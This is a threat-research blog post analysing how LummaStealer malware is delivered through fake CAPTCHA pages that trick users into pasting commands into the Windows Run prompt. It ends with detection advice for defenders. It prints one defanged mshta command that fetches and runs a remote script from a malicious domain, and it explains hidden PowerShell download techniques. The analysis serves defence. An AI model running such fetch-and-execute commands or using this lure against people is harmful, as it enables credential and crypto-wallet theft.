Latest News: Binary Defense Named a Strong Performer by Leading Independent Research Firm

Access Report
Binary Defense Full Color Logo Dark Markless Binary Defense Full Color Logo Dark Markless Binary Defense Full Color Logo Light Markless Binary Defense Full Color Logo Light Markless

Search

Binary Defense Full Color Logo Dark Markless Binary Defense Full Color Logo Dark Markless Binary Defense Full Color Logo Light Markless Binary Defense Full Color Logo Light Markless

Analyzing LummaStealer’s FakeCAPTCHA Delivery Tactics

Paste, Click, Compromised

By ARC Labs
Published: April 30, 2025

By

Written by ARC Labs contributor, Shannon Mong

Threat actors continue to evolve their initial access tactics, blending social engineering with lightweight payload delivery to evade detection and scale operations. Binary Defense’s ARC Labs researchers recently analyzed an uptick in campaigns involving LummaStealer (a Malware-as-a-Service platform) and its use alongside a deceptive user prompt method, FakeCAPTCHA.

This research walks through how these campaigns operate, why they’re effective, and most importantly, how you can detect and stop them.

What is LummaStealer?

LummaStealer, also known as LummaC2, is an information stealer active since 2022 and sold on underground forums. Initially named “7.62mm Stealer,” this malware kit is marketed to threat actors of all skill levels and often used in phishing campaigns.

Because LummaStealer operates as a service, each campaign can vary based on the operator and their target. But the goal is consistent: steal sensitive data like browser credentials, crypto wallets, and system info.

In early campaigns, the payload was typically delivered via malicious HTML attachments that mimicked Microsoft Word files. More recent variants are using a FakeCAPTCHA technique that tricks the user into running the payload themselves.

What is FakeCAPTCHA?

FakeCAPTCHA, also referred to as part of a “ClickFix” campaign, masquerades as a common human verification page. Instead of a real CAPTCHA challenge, victims are presented with a fake error, often a “Verification Failed – Network Error” message or a “Human Verification” message.

(AhnLab Security Intelligence Center) 

The attacker then directs the victim to run a command manually by:

  1. Pressing Windows + R to open the Run prompt
  2. Pasting a malicious PowerShell or mshta command copied from the clipboard
  3. Hitting Enter

The result: the victim unknowingly executes the first of a series of PowerShell scripts which results in the delivery of malware.

Breakdown of the Infection Chain

The LummaStealer campaign doesn’t rely on exploits, it relies on tricking the user and abusing built-in native Windows utilities to stay quiet and avoid endpoint detection.

After the FakeCAPTCHA prompt is shown in a LummaStealer/LummaC2 campaign, the user is tricked into pasting a command into the Windows Run prompt. That command triggers a malicious mshta redirect, which downloads a script disguised as a .mp4 file:

mshta hxxps://klipjagemiu[.]shop/web44[.]mp4 

Although it looks like a video file, it’s actually a PowerShell script that kicks off the infection. Once run, it launches a PowerShell script that downloads another file, this time named web.png. That file contains the actual LummaC2 payload.

The LummaC2 malware is designed to steal sensitive data like browser credentials, cryptocurrency wallets, and other system information.

Once active, it sends the following data to the command-and-control server:

  • hwid: a unique identifier for the infected system
  • pid: a number (1–3) that reflects the type of data exfiltrated
  • lid: likely a Lumma campaign ID used to track infected systems per attacker

In a recent Binary Defense lab analysis, we ran a LummaStealer sample to observe the full infection chain. After the user runs the initial command, PowerShell spins up a hidden window to execute an obfuscated command.

This leads to the download of the web.png script using the Net.WebClient function, a common PowerShell method used for pulling in remote payloads. Although it poses as an image, web.png is actually another script that delivers the final LummaC2 malware to the system.

Technical Insight: Net.WebClient in Action

The PowerShell “Net.WebClient” function is utilized as a means to transmit data to and from a resource identified within the overall PowerShell command line. Threat actors can utilize the WebClient function in order to download a second stage payload or for data exfiltration from an initial staging malicious payload or malicious loader. This can be used in conjunction with other PowerShell parameters, such as “-hidden” and “bypass” in order to further evade detection on a system by creating a hidden PowerShell window to execute the Net.WebClient function silently within the environment. 

Detection Recommendations

Binary Defense recommends the following for defenders:

  • Monitor PowerShell activity for the use of the Net.WebClient cmdlet, especially when launched from unexpected parent processes such as mshta.exe or when paired with hidden execution flags.
  • Monitor external network activity in relation to mshta.exe that may indicate malicious script loading.
  • Look for time-correlated clipboard usage and Run prompt activity.
  • Create detections for staged file downloads, especially when file extensions and MIME types don’t align (e.g., .mp4 or .png used to deliver scripts).

We’ve also published queries and hunting logic on the ARC Labs repo: https://github.com/BinaryDefense/ARC-Labs-Hunting-Queries

References:  

https://asec.ahnlab.com/en/85699/

https://www.joesandbox.com/analysis/1583047/0/html

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient?view=net-9.0